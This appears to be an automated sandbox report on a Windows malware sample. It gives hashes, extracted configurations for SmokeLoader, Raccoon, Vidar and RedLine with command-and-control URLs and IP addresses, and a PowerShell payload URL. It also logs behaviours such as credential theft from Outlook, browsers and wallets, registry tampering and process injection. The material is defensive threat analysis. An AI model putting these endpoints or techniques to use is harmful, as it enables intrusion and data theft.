Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
12-10-2021 12:02
Static task
static1
Behavioral task
behavioral1
Sample
b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe
Resource
win10-en-20210920
General
-
Target
b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe
-
Size
175KB
-
MD5
9119ad58173dcd759a3e0590b730340a
-
SHA1
072bcb565930ae49628a1e2b604435a0d8f43776
-
SHA256
b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275
-
SHA512
4a0fb45fe78b268cff152a59fff0507c52810bed97cb6e3f6089071c8d6dd960a9e06d3c46212660223c742b927c4a671764c36b83d31f5607f40308a20a1795
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
fbe5e97e7d069407605ee9138022aa82166657e6
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
Extracted
vidar
41.3
1033
https://mas.to/@oleg98
-
profile_id
1033
Extracted
raccoon
1.8.2
8d179b9e611eee525425544ee8c6d77360ab7cd9
-
url4cnc
http://teletop.top/agrybirdsgamerept
http://teleta.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
redline
159
190.2.136.29:3279
Extracted
raccoon
1.8.2
27d80aa27e80cd2ef63c638e2752e24242d1b37c
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
Extracted
redline
w1
109.234.34.165:12323
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral1/memory/1760-154-0x0000000000140000-0x0000000000162000-memory.dmp family_redline behavioral1/memory/1760-160-0x000000000015B222-mapping.dmp family_redline behavioral1/memory/3272-175-0x0000000000A40000-0x0000000000A71000-memory.dmp family_redline behavioral1/memory/3272-185-0x00000000027A0000-0x00000000027BC000-memory.dmp family_redline behavioral1/memory/2412-315-0x000000000041B25E-mapping.dmp family_redline behavioral1/memory/2412-353-0x00000000053F0000-0x00000000059F6000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/752-131-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar behavioral1/memory/752-130-0x00000000034A0000-0x0000000003576000-memory.dmp family_vidar -
Blocklisted process makes network request 9 IoCs
flow pid Process 87 3060 powershell.exe 89 3060 powershell.exe 90 3060 powershell.exe 91 3060 powershell.exe 93 3060 powershell.exe 96 3060 powershell.exe 98 3060 powershell.exe 100 3060 powershell.exe 102 3060 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 2212 4DE.exe 752 9A2.exe 1272 1470.exe 2868 1EA3.exe 3396 2DC7.exe 2496 34BD.exe 3272 3C4F.exe 3220 4D87.exe 1604 53F0.exe 1208 53F0.exe 2412 53F0.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000900000001abf2-550.dat upx behavioral1/files/0x000a00000001abf4-551.dat upx -
resource yara_rule behavioral1/files/0x000600000001abfd-142.dat vmprotect behavioral1/files/0x000600000001abfd-143.dat vmprotect behavioral1/memory/3396-145-0x0000000000BC0000-0x0000000001A06000-memory.dmp vmprotect -
Deletes itself 1 IoCs
pid Process 3040 Process not Found -
Loads dropped DLL 9 IoCs
pid Process 752 9A2.exe 752 9A2.exe 864 Process not Found 864 Process not Found 2212 4DE.exe 2212 4DE.exe 2212 4DE.exe 2212 4DE.exe 2212 4DE.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 4DE.exe -
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 4DE.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook 4DE.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1776 set thread context of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 1272 set thread context of 1760 1272 1470.exe 80 PID 1604 set thread context of 2412 1604 53F0.exe 96 -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 24 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_g342k4vy.1yh.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIAC7B.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIAC6A.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_e1hhtsjc.dih.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIAC49.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIAC8C.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIAC7A.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9A2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9A2.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2616 timeout.exe 400 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 3152 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1152 reg.exe 3344 reg.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 91 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 93 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 89 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 90 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2004 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 2004 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3040 Process not Found -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 632 Process not Found 632 Process not Found 632 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2004 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 3152 taskkill.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 1760 RegSvcs.exe Token: SeDebugPrivilege 3272 3C4F.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 1400 powershell.exe Token: SeIncreaseQuotaPrivilege 1400 powershell.exe Token: SeSecurityPrivilege 1400 powershell.exe Token: SeTakeOwnershipPrivilege 1400 powershell.exe Token: SeLoadDriverPrivilege 1400 powershell.exe Token: SeSystemProfilePrivilege 1400 powershell.exe Token: SeSystemtimePrivilege 1400 powershell.exe Token: SeProfSingleProcessPrivilege 1400 powershell.exe Token: SeIncBasePriorityPrivilege 1400 powershell.exe Token: SeCreatePagefilePrivilege 1400 powershell.exe Token: SeBackupPrivilege 1400 powershell.exe Token: SeRestorePrivilege 1400 powershell.exe Token: SeShutdownPrivilege 1400 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeSystemEnvironmentPrivilege 1400 powershell.exe Token: SeRemoteShutdownPrivilege 1400 powershell.exe Token: SeUndockPrivilege 1400 powershell.exe Token: SeManageVolumePrivilege 1400 powershell.exe Token: 33 1400 powershell.exe Token: 34 1400 powershell.exe Token: 35 1400 powershell.exe Token: 36 1400 powershell.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 3232 powershell.exe Token: SeIncreaseQuotaPrivilege 3232 powershell.exe Token: SeSecurityPrivilege 3232 powershell.exe Token: SeTakeOwnershipPrivilege 3232 powershell.exe Token: SeLoadDriverPrivilege 3232 powershell.exe Token: SeSystemProfilePrivilege 3232 powershell.exe Token: SeSystemtimePrivilege 3232 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious use of SendNotifyMessage 5 IoCs
pid Process 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1776 wrote to memory of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 1776 wrote to memory of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 1776 wrote to memory of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 1776 wrote to memory of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 1776 wrote to memory of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 1776 wrote to memory of 2004 1776 b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe 70 PID 3040 wrote to memory of 2212 3040 Process not Found 71 PID 3040 wrote to memory of 2212 3040 Process not Found 71 PID 3040 wrote to memory of 2212 3040 Process not Found 71 PID 3040 wrote to memory of 752 3040 Process not Found 72 PID 3040 wrote to memory of 752 3040 Process not Found 72 PID 3040 wrote to memory of 752 3040 Process not Found 72 PID 3040 wrote to memory of 1272 3040 Process not Found 73 PID 3040 wrote to memory of 1272 3040 Process not Found 73 PID 3040 wrote to memory of 1272 3040 Process not Found 73 PID 3040 wrote to memory of 2868 3040 Process not Found 75 PID 3040 wrote to memory of 2868 3040 Process not Found 75 PID 3040 wrote to memory of 2868 3040 Process not Found 75 PID 3040 wrote to memory of 3396 3040 Process not Found 76 PID 3040 wrote to memory of 3396 3040 Process not Found 76 PID 752 wrote to memory of 904 752 9A2.exe 77 PID 752 wrote to memory of 904 752 9A2.exe 77 PID 752 wrote to memory of 904 752 9A2.exe 77 PID 3040 wrote to memory of 2496 3040 Process not Found 79 PID 3040 wrote to memory of 2496 3040 Process not Found 79 PID 3040 wrote to memory of 2496 3040 Process not Found 79 PID 1272 wrote to memory of 1760 1272 1470.exe 80 PID 1272 wrote to memory of 1760 1272 1470.exe 80 PID 1272 wrote to memory of 1760 1272 1470.exe 80 PID 1272 wrote to memory of 1760 1272 1470.exe 80 PID 1272 wrote to memory of 1760 1272 1470.exe 80 PID 904 wrote to memory of 3152 904 cmd.exe 82 PID 904 wrote to memory of 3152 904 cmd.exe 82 PID 904 wrote to memory of 3152 904 cmd.exe 82 PID 3040 wrote to memory of 3272 3040 Process not Found 84 PID 3040 wrote to memory of 3272 3040 Process not Found 84 PID 3040 wrote to memory of 3272 3040 Process not Found 84 PID 904 wrote to memory of 2616 904 cmd.exe 85 PID 904 wrote to memory of 2616 904 cmd.exe 85 PID 904 wrote to memory of 2616 904 cmd.exe 85 PID 3040 wrote to memory of 3220 3040 Process not Found 86 PID 3040 wrote to memory of 3220 3040 Process not Found 86 PID 3040 wrote to memory of 3220 3040 Process not Found 86 PID 3396 wrote to memory of 2216 3396 2DC7.exe 87 PID 3396 wrote to memory of 2216 3396 2DC7.exe 87 PID 3040 wrote to memory of 1604 3040 Process not Found 89 PID 3040 wrote to memory of 1604 3040 Process not Found 89 PID 3040 wrote to memory of 1604 3040 Process not Found 89 PID 2216 wrote to memory of 1864 2216 powershell.exe 91 PID 2216 wrote to memory of 1864 2216 powershell.exe 91 PID 1864 wrote to memory of 1976 1864 csc.exe 92 PID 1864 wrote to memory of 1976 1864 csc.exe 92 PID 1604 wrote to memory of 1208 1604 53F0.exe 93 PID 1604 wrote to memory of 1208 1604 53F0.exe 93 PID 1604 wrote to memory of 1208 1604 53F0.exe 93 PID 2216 wrote to memory of 1400 2216 powershell.exe 94 PID 2216 wrote to memory of 1400 2216 powershell.exe 94 PID 1604 wrote to memory of 2412 1604 53F0.exe 96 PID 1604 wrote to memory of 2412 1604 53F0.exe 96 PID 1604 wrote to memory of 2412 1604 53F0.exe 96 PID 3220 wrote to memory of 2376 